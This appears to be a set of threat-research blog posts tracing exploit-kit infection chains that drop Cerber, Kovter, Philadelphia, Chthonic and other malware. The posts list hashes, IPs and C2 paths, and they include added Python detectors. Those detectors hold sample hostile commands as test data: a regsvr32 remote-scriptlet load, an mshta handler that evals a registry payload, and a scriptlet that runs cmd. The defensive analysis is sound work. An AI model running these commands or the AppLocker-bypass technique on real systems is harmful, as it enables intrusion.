Magnitude EK via RoughTed drops Cerber Ransomware

Summary:

In my previous blog post I found Rig EK via the RoughTed malvertising operation. I saw in the MalwareBytes article that it also redirected to Magnitude EK. Curious to find it, I set my lab up for Magnitude and went looking. It only took about 5 minutes.

I wonder what else RoughTed leads to apart from that which has been listed.

Background Information:

  • Article from RSA. Although it is a few months old and missing some newer aspects of Magnitude, the fundamentals have not changed.

https://community.rsa.com/community/products/netwitness/blog/2017/02/09/magnitude-exploit-kit-under-the-hood

  • A few previous Magnitude EK posts from me.

Multiple Magnitude EK drops Cerber Ransomware Samples

Magnitude EK delivers Cerber

  • An article regarding RoughTed Malvertising:

https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/

Downloads (in password-protected zip)

Details of infection chain:

[Infection chain diagram: Magnitude EK via RoughTed malvertising drops Cerber]

Full Details:

This flow began with “RoughTed”, a malvertising operation that MalwareBytes reported on recently. Other than the initial starting point, everything else seemed fairly normal.

I have detailed Magnitude EK in previous posts so please refer to the “background information” section above for more info.

This time, though, I had a double landing page which opened in a separate window. I only saw PowerShell commands in the process list for both “a.exe” and “b.exe”. In this flow “b.exe” was downloaded successfully and ran, which I have not seen before. The scriptlet also failed to create even a failed payload.

Below is a screenshot of what happens when the Flash file runs. It appears to generate a URL that is met with a 404; however, another URL is then requested to download a payload that exploits CVE-2015-2426 (the kernel-mode OpenType font driver elevation-of-privilege bug patched in MS15-078), which in this case allowed Magnitude to run its PowerShell commands successfully.

[Screenshot: requests made after the Magnitude Flash file runs]

The Cerber binary had a reasonably high number of detections:

SHA256: 60e2b83d21c39f78d1612c2f5a06a943d8b6cc51c1f4a51312b85dff414f4e76
File name: b.exe
Detection ratio: 19 / 61

I only noticed one change in this Cerber, and that was the ransom note, which said (and this is not a typo) “Hi, I’am CERBER RANSOMWARE :)”. I’m fairly sure I have not seen that before.

[Screenshot: Cerber ransom note]

Rig EK via RoughTed Malvertising drops Kovter

Summary:

I stumbled across an article by MalwareBytes regarding a “new” malvertising campaign they had called “RoughTed”, on account of the first domain they discovered. I have not seen anyone report Rig EK from this campaign publicly, at least not on Twitter. Apparently it is almost a year old.

Anyway, I attempted several runs and eventually landed on Rig EK, which dropped Kovter click-fraud malware. Initially I did not know what this malware was, having never seen it, so I requested the aid of @Antelox, who identified it but also noted that it was loaded by a PowerShell script, which was unusual for Kovter.

The iframe to Rig EK is interesting: an almost unnecessarily large script that likely does other things. Pore over the PCAP/CSV and Hybrid Analysis report for IOCs.

Background Information:

  • A few articles on Rig exploit kit and its evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Article on Rough Ted:

https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/

  • Article on Kovter:

https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/

Downloads

(in password-protected zip; password: infected)

Details of infection chain:

[Infection chain diagram: Rig EK via RoughTed malvertising drops Kovter via a PowerShell loader]

Full Details:

RoughTed is a malvertising operation known for its wide scope. See the MalwareBytes article above for a more in-depth dive. In this chain I started with the RoughTed URL and within 5 seconds Rig EK had dropped a payload.

[Screenshot: first RoughTed request]

A series of 302 redirects and a check for time (and possibly geo-IP) finally led to a domain containing a script that appears to load Rig EK into an iframe.

[Screenshot: iframe script]

Rig EK contained a pre-landing page which makes several environment checks before initiating a POST request to the landing page.

[Screenshot: Rig EK pre-landing page]

Rig dropped Kovter, a click-fraud malware known for its persistence techniques.

SHA256: 9674fe85726c33f982d58eb362cd598cd944dd8f3f9d0a1b5506b9470cb4b57e
File name: muabump0.exe
Detection ratio: 20 / 59

Although the malware ran fine on my machine, I did submit it to Hybrid Analysis to identify all IOCs. I missed the loader part, which was identified by @Antelox when I gave him the sample. Kovter appeared to be loaded by a huge PowerShell script. The image below is at maximum zoom and shows only a third of the script.

[Screenshot: excerpt of the PowerShell loader script]

Below is the bottom half of the infographic, which shows Kovter’s persistence.

It is described in great detail by MalwareBytes. I used the article to match IOCs.

[Infographic excerpt: Kovter persistence]
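As an added example, not the author’s code and not taken from this capture, the following scans a Windows registry export (.reg text) for the persistence chain the MalwareBytes Kovter write-up linked above describes: a Run value that launches a file with a made-up extension, a file-type mapping for that extension, and a shell\open\command handler that runs mshta with inline script reading the real payload back out of the registry. The export is constructed, and the exact key names and extension list are assumptions taken from that public write-up rather than from this run.

```python
"""Scan a .reg export for a Kovter-style fileless persistence chain.
Added example; the sample export is constructed and the key layout is an
assumption based on the public Kovter write-up, not data from this capture.
"""
import re

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VAL_RE = re.compile(r'^(?:@|"((?:[^"\\]|\\.)*)")=(.*)$')
_SCRIPT_HOST = re.compile(r"\b(mshta|wscript|cscript|powershell|rundll32)(\.exe)?\b", re.I)
_INLINE_SCRIPT = re.compile(r"javascript:|vbscript:|-enc(odedcommand)?\b", re.I)
_HANDLER_SUFFIX = "\\shell\\open\\command"
ORDINARY_RUN_EXT = {"exe", "lnk", "bat", "cmd", "com"}   # assumption: normal Run targets


def _unescape(s):
    """Undo .reg string escaping (backslash-escaped backslashes and quotes)."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1]); i += 2
        else:
            out.append(s[i]); i += 1
    return "".join(out)


def parse_reg(text):
    """Yield (key, value_name, data); value_name "" is the (Default) value."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = _VAL_RE.match(line)
        if m and key is not None:
            data = m.group(2)
            if len(data) >= 2 and data[0] == data[-1] == '"':
                data = _unescape(data[1:-1])
            yield key, m.group(1) or "", data


def _target_ext(cmd):
    """Extension of the program a Run value launches, ignoring its arguments."""
    cmd = cmd.strip()
    path = cmd[1:].split('"', 1)[0] if cmd.startswith('"') else cmd.split(" ", 1)[0]
    leaf = path.rsplit("\\", 1)[-1]
    return leaf.rsplit(".", 1)[-1].lower() if "." in leaf else ""


def scan_reg(text):
    """Link Run values with odd extensions to file handlers that run inline script."""
    odd_run, ext_to_progid, bad_handlers = {}, {}, {}
    for key, name, data in parse_reg(text):
        k = key.lower()
        leaf = key.rsplit("\\", 1)[-1]
        if k.endswith("\\currentversion\\run"):
            ext = _target_ext(data)
            if ext and ext not in ORDINARY_RUN_EXT:
                odd_run[ext] = (name, data)
        elif name == "" and leaf.startswith("."):          # ".ext" -> ProgID mapping
            ext_to_progid[leaf[1:].lower()] = data
        elif name == "" and k.endswith(_HANDLER_SUFFIX):
            progid = key[:-len(_HANDLER_SUFFIX)].rsplit("\\", 1)[-1].lower()
            if _SCRIPT_HOST.search(data) and _INLINE_SCRIPT.search(data):
                bad_handlers[progid] = data
    findings, linked = [], set()
    for ext, (name, path) in odd_run.items():
        progid = ext_to_progid.get(ext, "").lower()
        handler = bad_handlers.get(progid)
        if handler:
            linked.add(progid)
            findings.append({"kind": "fileless-run-chain", "run_value": name, "path": path,
                             "ext": ext, "progid": progid, "handler": handler})
        else:
            findings.append({"kind": "run-odd-extension", "run_value": name,
                             "path": path, "ext": ext})
    for progid, handler in bad_handlers.items():
        if progid not in linked:
            findings.append({"kind": "handler-inline-script", "progid": progid, "handler": handler})
    return findings


# Constructed export: one benign Run value, one Kovter-style chain, one benign handler.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\lab\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"7f3a9c"="\"C:\\Users\\lab\\AppData\\Local\\Temp\\4d2e\\a1b2c3.e9f0a\""

[HKEY_CURRENT_USER\Software\Classes\.e9f0a]
@="e9f0afile"

[HKEY_CURRENT_USER\Software\Classes\e9f0afile\shell\open\command]
@="\"C:\\Windows\\System32\\mshta.exe\" \"javascript:s=new ActiveXObject('WScript.Shell');eval(s.RegRead('HKCU\\\\Software\\\\4d2e\\\\payload'));\""

[HKEY_CURRENT_USER\Software\Classes\txtfile\shell\open\command]
@="\"C:\\Windows\\System32\\notepad.exe\" \"%1\""
"""

if __name__ == "__main__":
    for finding in scan_reg(SAMPLE_REG):
        print(finding)
```

The three parts are kept separate on purpose: a Run value with an unknown extension is only a weak signal on its own, and a handler that invokes mshta with a javascript: URL is the strong one; joining them through the .ext to ProgID mapping is what distinguishes the fileless chain from an unusual but legitimate file association. Exporting HKCU\Software\Classes as well as HKCR matters, since the per-user hive is where a non-admin sample can write.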


Magnitude EK via malvertising delivers Cerber Ransomware

Summary:

Magnitude EK continues to drop Cerber ransomware. In this flow Magnitude EK has renamed its scriptlet from .sct to .ico. Cerber encrypted all files with a .BEEF extension in this instance. All this occurred within 60 seconds of visiting the malvertising chain, which was likely sped up by my new VM, which is 64-bit and has more horsepower.

I like to track Magnitude. Even though its reach is very limited, it still appears to be updating, and I’m fairly sure that if any browser exploits are released in the Shadow Brokers’ June dump, the Magnitude threat actors will jump on them in a flash.

Background Information:

  • Article from RSA. Although it is a few months old and missing some newer aspects of Magnitude, the fundamentals have not changed.

https://community.rsa.com/community/products/netwitness/blog/2017/02/09/magnitude-exploit-kit-under-the-hood

  • Previous Magnitude EK posts from me.

Multiple Magnitude EK drops Cerber Ransomware Samples

Magnitude EK delivers Cerber

Downloads (in password-protected zip)

Details of infection chain:

[Infection chain diagram: Magnitude EK drops Cerber ransomware; it now uses .ico instead of .sct for the scriptlet]

Full Details:

This flow was found through a malvertising chain. A series of 302 redirects leads to the first Magnitude profiling gate on a compromised website. These websites are usually hosting financial scams. If you do not pass the profiling you are presented with a normal-looking website.

I have detailed Magnitude EK in previous posts, so please refer to the “background information” section above for more info.

I have recently changed my VM to a 64-bit machine. I also made a few changes to make Magnitude EK less noisy. In this run it took around 60 seconds to become infected with Cerber and no pesky UAC alerts came up.

Below are Magnitude EK’s Flash file and the payload “a.exe”, which was Cerber.

SHA256: e927fff8fe693e9c92fdbc51aeb2714a4d12aa41c6105db7e245ce9f15aa38a9
File name: gwssy.swf
Detection ratio: 0 / 55

SHA256: 4edb020b7147324eb7abfd58a3e3a95e35ef55aa4c7838a595aa14a17ca0bf4f
File name: a.exe
Detection ratio: 23 / 59

Cerber encrypted my files with a .BEEF extension. I tweeted this earlier and discovered (thanks to the reply linked below) that Cerber in fact encrypts with a random 4-character extension based on the machine GUID.

https://twitter.com/MarceloRivero/status/867415217034211329

[Screenshot: files encrypted with the .BEEF extension]

In addition, Magnitude EK has changed its scriptlet to a .ico extension instead of .sct. This scriptlet is used to bypass AppLocker; however, the payload failed to run. The extension change did not affect the network signature, which keys on the scriptlet content rather than the file name:

ETPRO TROJAN App Whitelist Bypass Via Com Scriptlet Inbound (A Network Trojan was Detected) [2819903]

[Screenshot: the .ico scriptlet]

Here is a deobfuscated version revealing what it does:

[Screenshot: deobfuscated scriptlet]
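As an added example (not code from the page or the author), the following shows how a content-based check catches a COM scriptlet no matter what extension it is served under, which is why renaming .sct to .ico changes nothing for a signature like the one above. It also checks a process command line for regsvr32 pulling a scriptlet over the network; that regsvr32 /i:<url> scrobj.dll is how this .ico was executed is an assumption, since the page does not say how the scriptlet was invoked. The HTTP body and command line are constructed.

```python
"""Content-based detection of a COM scriptlet served with a misleading
extension, plus a check of a regsvr32 command line that loads one remotely.
Added example; the sample response body and command line are constructed,
and regsvr32 as the loader is an assumption, not something the page states.
"""
import re

# A COM scriptlet is XML with a <scriptlet> root, a <registration> element
# carrying a progid/classid and a <script language=...> body. Extension and
# Content-Type are attacker-chosen, so detection keys on these bytes instead.
_SCRIPTLET_MARKERS = (
    re.compile(rb"<\s*scriptlet\b", re.I),
    re.compile(rb"<\s*registration\b[^>]*\b(progid|classid)\s*=", re.I),
    re.compile(rb"<\s*script\b[^>]*\blanguage\s*=\s*[\"']?(j|java|vb)script", re.I),
)
# regsvr32 registering a remote scriptlet through scrobj.dll ("squiblydoo").
_REGSVR32_REMOTE = re.compile(
    r"regsvr32(\.exe)?\b.*?/i:\s*(https?|ftp)://\S+.*?\bscrobj\.dll", re.I)


def looks_like_scriptlet(body: bytes) -> bool:
    """True when the body has the structure of a COM scriptlet."""
    head = body[:4096]                     # scriptlets are small; bound the work
    return all(m.search(head) for m in _SCRIPTLET_MARKERS)


def _extension(url: str) -> str:
    leaf = url.split("?", 1)[0].rsplit("/", 1)[-1]
    return leaf.rsplit(".", 1)[-1].lower() if "." in leaf else ""


def classify_response(url: str, content_type: str, body: bytes) -> dict:
    """Compare what the server claims (extension, Content-Type) with what the
    bytes are; scriptlet content under any extension but .sct is a masquerade."""
    ext = _extension(url)
    is_sct = looks_like_scriptlet(body)
    return {
        "url": url,
        "declared_ext": ext,
        "content_type": content_type,
        "is_scriptlet": is_sct,
        "masquerade": is_sct and ext != "sct",
    }


def suspicious_regsvr32(cmdline: str) -> bool:
    """True for a regsvr32 invocation that fetches its scriptlet over the network."""
    return bool(_REGSVR32_REMOTE.search(cmdline))


# Constructed sample: a scriptlet body served as if it were a favicon.
SAMPLE_BODY = b"""<?XML version="1.0"?>
<scriptlet>
<registration progid="Example.Hypothetical" classid="{00000000-0000-0000-0000-000000000000}">
<script language="JScript"><![CDATA[
  var sh = new ActiveXObject("WScript.Shell");
  sh.Run("cmd /c echo hypothetical payload", 0, true);
]]></script>
</registration>
</scriptlet>
"""

if __name__ == "__main__":
    print(classify_response("http://example.invalid/favicon.ico", "image/x-icon", SAMPLE_BODY))
    print(suspicious_regsvr32(
        "regsvr32.exe /s /n /u /i:http://example.invalid/favicon.ico scrobj.dll"))
```

The masquerade flag is the one worth alerting on: a .sct that is a scriptlet is at least honest, while scriptlet XML behind an image extension (or an image/* Content-Type) has no legitimate reason to exist. On the host side, AppLocker in its default configuration does not stop regsvr32 from executing a scriptlet it registers, so the process command line is the control point.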


Rig EK via TDS drops Smoke Loader, leads to TeamViewer.

Summary:


This decoy site was serving Philadelphia ransomware the day before. I found it again through a malvertising chain and now believe it was served by Keitaro TDS.

This time it dropped Smoke Loader, which downloaded and installed TeamViewer. This appeared to be a legitimate version, or at least it did not trigger any AV alerts on VirusTotal. I saw an established connection but did not notice anything odd on my host. Unlike other times I have seen Smoke Loader, there was only this one payload.

Background Information:

  • A few articles on Rig exploit kit and its evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • In depth look at Smoke Loader:

https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/


Downloads

(in password-protected zip; password: infected)

Details of infection chain:

[Infection chain diagram: Rig EK via Keitaro TDS drops Smoke Loader, which downloads TeamViewer]

Full Details:

A malvertising chain (possibly Keitaro TDS) leads to a 302 to Rig EK.

The Rig landing page is hosted on IP 185.154.53.34. The landing page displayed the text “Zero bill Elementos len” in the browser.

[Screenshot: Rig EK landing page]

The payload dropped was Smoke Loader, which, among the usual Adobe check-in requests, made a request to “burbulator.bit” that returned a config. TeamViewer was then installed, and it appeared to be a legitimate version. Note that a clean VirusTotal result only says the file is the genuine TeamViewer binary, not that the installation was wanted; the things to alert on are the installing process (Smoke Loader) and the unexpected outbound TeamViewer session, not the file itself:

SHA256: 96578ec1817e9a5144cfa427b6c9aa6c14dd42b08d9d51fe1e2a98281024632e
File name: TeamViewer.exe
Detection ratio: 0 / 61

[Screenshot: TeamViewer process and connection]

The file established a connection to TeamViewer servers, though I did not see anyone messing about on my host. I left it running for around an hour and nothing else was dropped by Smoke Loader.

Magnitude EK via Malvertising drops Cerber Ransomware

Summary:

For a few weeks I lost track of Magnitude. The proxies I was using were either blocking the malvertising chain or were already known to Magnitude’s gates. However, I have found it again, and it has become the new “PseudoDarkleech” for me, in that it always seems to drop Cerber ransomware. This time I followed the decryptor to see what the ransom was and got a special deal of 0.5654 bitcoin.

This time, although I used a proxy, I modified the CSV to contain the real IP addresses. Please see previous Magnitude posts for a more detailed look at what is going on.

Background Information:

  • Article from RSA. Although it is a few months old and missing some newer aspects of Magnitude, the fundamentals have not changed.

https://community.rsa.com/community/products/netwitness/blog/2017/02/09/magnitude-exploit-kit-under-the-hood

  • Previous Magnitude EK posts from me.

Multiple Magnitude EK drops Cerber Ransomware Samples

Magnitude EK delivers Cerber

Downloads (in password-protected zip)

Details of infection chain:

[Infection chain diagram: Magnitude EK via malvertising drops Cerber ransomware]

Full Details:

This flow was found through a malvertising chain. A series of 302 redirects leads to the first Magnitude profiling gate on a compromised website. These websites are usually hosting financial scams. If you do not pass the profiling you are presented with a normal-looking website.

I have detailed Magnitude EK in previous posts so please refer to the “background information” section above for more info.

Magnitude is very noisy from a user’s point of view. Its multiple vectors for delivering a payload, such as a scheduled task and the use of a scriptlet, create multiple failed payloads. I think I end up with about 5-6 empty payloads after every flow. I’m not sure whether these have failed due to my host or because a certain requirement has not been met. What’s more, it attempts to run the scriptlet multiple times, and each attempt creates a UAC prompt to accept the command, meaning I am forced to cancel or OK it in order to do anything else. All the while, Magnitude is attempting to fetch a real payload.

What seems to lead to Cerber is Magnitude’s Flash file; the URLs with no domain have been initiated from this file. Here is the VirusTotal report on the Flash exploit 343s66fq0i75g.swf. Magnitude’s Flash exploits always have a very low detection rate; in fact this one was zero at the time of writing.

SHA256: d77aa8f5c7826c271cfc4f9be1b4b11863351add4cba4161005b134e80651fcb
File name: 343s66fq0i75g.swf
Detection ratio: 0 / 56

Oddly, my version of Cerber had already been uploaded to VirusTotal, which meant the detections were quite high. This is very strange, because usually Cerber has a unique hash for every sample (or at least it has in my experience with EKs).

SHA256: ab0b0f4fbfef9d965dcf1e49c7ff53378ee5d834e7ef79b9b621c3d0594211f0
File name: a.exe
Detection ratio: 28 / 62

Cerber encrypts using a .ba89 extension and drops a ransom note and a decryptor in the form of an HTA file. The ransom note was named “_READ_THIS_FILE_3WF17TOB.txt”. It did not play audio or change my background.

[Screenshot: ransom note]

[Screenshot: HTA decryptor]

I decided this time to follow the instructions using the Tor link. After passing a “bot” CAPTCHA test (which I forgot to screenshot, but it involved clicking similar images to continue), the decryptor gave me a special price of 0.5654 bitcoin, which would increase to 1.13008 after 5 days.

[Screenshot: decryptor pricing page]

There is also an option to decrypt one file for free to test that it is actually working. I did not try this, but judging by the professionalism of this “service” it is likely it would work.

[Screenshot: free file decryption option]

Rig EK drops Pony, leads to Philadelphia Ransomware

Summary:

It’s always interesting to find different malware from Rig EK. This campaign was found from malvertising. There did not appear to be a compromised site as such, so it could possibly be a TDS. The landing page and Flash/payload appeared to be hosted on different IP addresses, which is unusual.

The initial payload was Pony loader, which loaded a ransomware known as Philadelphia. This ransomware is created from a builder. The instructions are here.

It encrypted files with a .locked extension and demanded a 0.3 Bitcoin ransom. It is not known to be a particularly sophisticated malware.

I requested the help of @Antelox again, who quickly identified it as Pony/Philadelphia just from my description.

Background Information:

  • A few articles on Rig exploit kit and its evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Articles regarding Philadelphia ransomware.

https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware

https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/

Downloads

(in password-protected zip; password: infected)

Details of infection chain:

[Infection chain diagram: Rig EK drops Pony loader, which loads Philadelphia ransomware]

Full Details:

A malvertising chain (possibly Keitaro TDS) leads to a 302 to Rig EK.

The Rig landing page is on 69.61.66.226; however, the Flash file and payload come from 185.158.112.49, which also appears to have no domain. The landing page displayed the text “Hehe nuclear” in the browser.

[Screenshot: Rig EK landing page]

The payload dropped was Pony loader, which made a POST request to 89.45.67.99/ppp/gate.php

SHA256: 82a363d6e60ec002b7d76f05970292b993f9ef72192e1db552b1f32b907cd466
File name: oeloatd4.exe
Detection ratio: 22 / 61

Pony downloads a large executable, which is a Philadelphia ransomware variant.

SHA256: 661133c3848e57c4541a54b094c1b7124986872c4ce475ceda02440b48c823c1
File name: 2223607.exe
Detection ratio: 41 / 61

The ransomware appeared to be very noisy. The CnC used the user agent string “AutoIt” and the URLs were self-explanatory, such as “de/de.php?p=Ping&id=5918651572eb6&s=Encrypting+%280+files%29”. The ransomware is written in the AutoIt scripting language.

[Screenshot: Philadelphia CnC beacons]
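Both check-ins described in this post are easy to pick out of a proxy log, and the Philadelphia one is worth catching early because its first beacon is sent before anything has been encrypted. The following is an added example, not the author’s code: it flags the Pony loader’s POST to a */gate.php gate and the Philadelphia GETs with User-Agent “AutoIt”, p=Ping and a readable status in s=. The log lines are constructed (the gate IP and query string are the ones quoted above), and the tab-separated layout of timestamp, source, method, URL and user-agent is an assumption about the log format.

```python
"""Flag Pony gate POSTs and Philadelphia AutoIt beacons in proxy log lines.
Added example; the log lines are constructed and the tab-separated field
layout (ts, src, method, url, user-agent) is an assumption.
"""
from urllib.parse import urlsplit, parse_qs

SAMPLE_LOG = """\
2017-05-16T12:00:01Z\t10.0.0.5\tPOST\thttp://89.45.67.99/ppp/gate.php\tMozilla/4.0
2017-05-16T12:00:09Z\t10.0.0.5\tGET\thttp://example.invalid/de/de.php?p=Ping&id=5918651572eb6&s=Encrypting+%280+files%29\tAutoIt
2017-05-16T12:00:41Z\t10.0.0.5\tGET\thttp://example.invalid/de/de.php?p=Ping&id=5918651572eb6&s=Encrypting+%2812+files%29\tAutoIt
2017-05-16T12:01:00Z\t10.0.0.7\tGET\thttp://www.example.com/index.html\tMozilla/5.0
2017-05-16T12:01:05Z\t10.0.0.7\tPOST\thttp://www.example.com/login\tMozilla/5.0
"""


def parse_line(line):
    ts, src, method, url, ua = line.rstrip("\n").split("\t", 4)
    return {"ts": ts, "src": src, "method": method, "url": url, "ua": ua}


def classify(rec):
    """Return the tags that apply to one request (empty list = nothing odd)."""
    u = urlsplit(rec["url"])
    q = parse_qs(u.query)          # decodes %xx and turns '+' into spaces
    tags = []
    # Pony: form POST to a gate.php check-in.
    if rec["method"] == "POST" and u.path.lower().endswith("/gate.php"):
        tags.append("pony-gate-post")
    # Philadelphia: AutoIt's default user-agent, p=Ping, and a readable status.
    if rec["ua"].strip().lower() == "autoit" and q.get("p", [""])[0].lower() == "ping":
        tags.append("philadelphia-beacon:" + q.get("s", [""])[0])
    return tags


def scan(log_text):
    """Per source host: how many Pony gate POSTs and which Philadelphia statuses."""
    findings = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        for tag in classify(rec):
            entry = findings.setdefault(rec["src"], {"pony_gate": 0, "philadelphia": []})
            if tag == "pony-gate-post":
                entry["pony_gate"] += 1
            else:
                entry["philadelphia"].append(tag.split(":", 1)[1])
    return findings


if __name__ == "__main__":
    for host, info in scan(SAMPLE_LOG).items():
        print(host, info)
```

The decoded status sequence (“Encrypting (0 files)”, then a rising count) shows how far the host has got, so a rule on the first beacon gives a window to isolate it. “AutoIt” is simply the default user-agent of AutoIt-compiled programs and shows up in legitimate tools too, which is why the check pairs it with the p=Ping and s= pattern rather than alerting on the user-agent alone.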

Finally, a window is created with a red ransom demand. A ransom note is created and all files are encrypted with the .locked extension. It also appeared to lock me out of accessing common folders such as Pictures. The ransomware demands 0.3 Bitcoin.

[Screenshots: ransom window, ransom note, locked folder]

This is a list of files that were dropped (you can download these):

[Screenshot: list of dropped files]

Rig EK delivers Chthonic

Summary:

Following a common malvertising chain I came across a website that redirected to a fake ad domain. Such gates have been detailed by other researchers such as Malware Breakdown. They contain a pre-landing page which further filters out unwanted visitors before the Rig EK landing page.

This example is a full chain and dropped Chthonic, which is a ZeuS variant. I requested the help of @Antelox, who quickly identified it as Chthonic. I thought the “.bit” traffic was familiar, but it has been a while since I saw this malware.

Background Information:

  • A few articles on Rig exploit kit and its evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Older article regarding the Chthonic banking trojan:

https://securelist.com/blog/virus-watch/68176/chthonic-a-new-modification-of-zeus/

Downloads

(in password-protected zip; password: infected)

Details of infection chain:

[Infection chain diagram: Rig EK on a porn website via a fake ad domain drops ZeuS Chthonic]

Full Details:

  • A malvertising chain leads to a porn site called “likexhamster”. This is similar to the real xhamster website, except with more Rig. The website contains a script called “popunder.php” which loads the fake ad domain “retalise.info”.
  • The domain contains a pre-landing page and an iframe to Rig EK. [Screenshot: pre-landing page]
  • one.dailynewshunt.co.in -> Landing Page -> Flash -> Payload
  • Dropped payload “4s64tsmt.exe”.
    SHA256: 6ef6dd38e0b763ff9877bd657ddbefc76ae72de7d49b0a5b82690c039036e1ee
    File name: 4s64tsmt.exe
    Detection ratio: 27 / 61
  • This was identified as Chthonic, a ZeuS variant, by @Antelox.
  • Chthonic lay idle for some time in the process list. It eventually created an executable called “WindowsMailB” and a UAC prompt appeared which, when accepted, rebooted the system.
  • After reboot the malware had added a startup entry and copied itself. It also downloaded a further binary, which was likely a module.
  • POST traffic to “multifest.bit” was observed. It is likely sending data to a CnC and getting a configuration back. [Screenshot: CnC POST traffic]
  • There may be other interesting connections in the PCAP. I have not found any recent detailed write-ups about Chthonic yet. According to the 2014 article by Securelist, Chthonic has the following capabilities: [Screenshot: capabilities list from the Securelist article]
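The “.bit” names that stood out here (multifest.bit for Chthonic, and burbulator.bit for Smoke Loader in the post above) are Namecoin domains, which do not exist in the ICANN root and can only be answered by a blockchain-aware or alternative-root resolver. That makes them a clean DNS-log indicator. The following is an added example, not the author’s code: it flags lookups for such TLDs and lookups sent to anything other than the corporate resolver. The log lines are constructed (only the two .bit names come from the write-ups), and the tab-separated layout of timestamp, client, resolver, name, type and rcode plus the resolver allow-list are assumptions.

```python
"""Flag DNS lookups for non-ICANN (blockchain) TLDs and resolver bypass.
Added example; the log lines are constructed and the field layout
(ts, src, dst, qname, qtype, rcode) and resolver list are assumptions.
"""
from collections import defaultdict

# TLDs absent from the ICANN root: Namecoin .bit and the Emercoin set.
NON_ICANN_TLDS = {"bit", "emc", "coin", "lib", "bazar"}
# Assumption: every client should send DNS only to this resolver.
CORP_RESOLVERS = {"10.0.0.53"}

SAMPLE_DNS_LOG = """\
2017-05-23T09:15:01Z\t10.0.0.5\t10.0.0.53\twww.example.com.\tA\tNOERROR
2017-05-23T09:15:07Z\t10.0.0.5\t10.0.0.53\tmultifest.bit.\tA\tNXDOMAIN
2017-05-23T09:15:08Z\t10.0.0.5\t203.0.113.53\tmultifest.bit.\tA\tNOERROR
2017-05-23T09:16:30Z\t10.0.0.9\t10.0.0.53\tburbulator.bit.\tA\tNXDOMAIN
2017-05-23T09:17:00Z\t10.0.0.7\t10.0.0.53\tupdate.example.net.\tAAAA\tNOERROR
"""


def parse(line):
    ts, src, dst, qname, qtype, rcode = line.rstrip("\n").split("\t")
    return {"ts": ts, "src": src, "dst": dst,
            "qname": qname.rstrip(".").lower(), "qtype": qtype, "rcode": rcode}


def reasons_for(rec):
    """Why one lookup is suspicious; empty list means it is not."""
    out = []
    tld = rec["qname"].rsplit(".", 1)[-1]
    if tld in NON_ICANN_TLDS:
        out.append("non-icann-tld:" + tld)
    if rec["dst"] not in CORP_RESOLVERS:
        out.append("resolver-bypass:" + rec["dst"])
    return out


def analyse(log_text):
    """Return {src: [(qname, [reason, ...]), ...]} for every suspicious lookup."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse(line)
        reasons = reasons_for(rec)
        if reasons:
            hits[rec["src"]].append((rec["qname"], reasons))
    return dict(hits)


if __name__ == "__main__":
    for host, lookups in analyse(SAMPLE_DNS_LOG).items():
        print(host, lookups)
```

The two signals reinforce each other: a .bit query that the corporate resolver answers NXDOMAIN is the malware trying the system resolver first, and the same name then going to an outside server is it falling back to a resolver that can actually answer, so the second line in the sample carries both reasons. Blocking outbound port 53 except from the corporate resolvers turns the second signal into a hard stop.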

Rig EK drops Bunitu Proxy Trojan

Summary:

I have been tracking Rig EK campaigns that drop Bunitu for a while now, but lately I’ve had some trouble with my lab getting the payload to download properly. Fortunately I have a sandbox which I can use. I’m sure I will figure out the issue!

This particular compromised site at 78.47.1.194 has a fairly long history of changing its domains. It is similar to 78.46.232.211, which is the other IP that I know of. They all contain an iframe leading to a URL on the same IP, which contains another iframe leading to Rig EK. As before, this iframe contains the tag “small”, so I like to call it the “small gate”.

As I ran this one in my sandbox, it evaluated the JavaScript and removed all the obfuscation save for base64. This is available to download below.

Background Information:

  • A few articles on Rig exploit kit and its evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

  • Article on Bunitu Trojan:

https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/

Downloads

(in password-protected zip)

As a bonus I’ve also included a deobfuscated version of the landing page:

Details of infection chain:

[Infection chain diagram: Rig EK drops Bunitu; the compromised website appears to be a game]

Full Details:

  • A malvertising chain leads to Rig EK, which delivers Bunitu. The website contains an iframe leading to another domain on the same IP, which contains an iframe to Rig EK.
  • The payload was rritws0m.exe, though I renamed it.
    SHA256: 817e477fcf49c02945e2929d7e661bc25bd1e35a564ac65ae368efdeddc21725
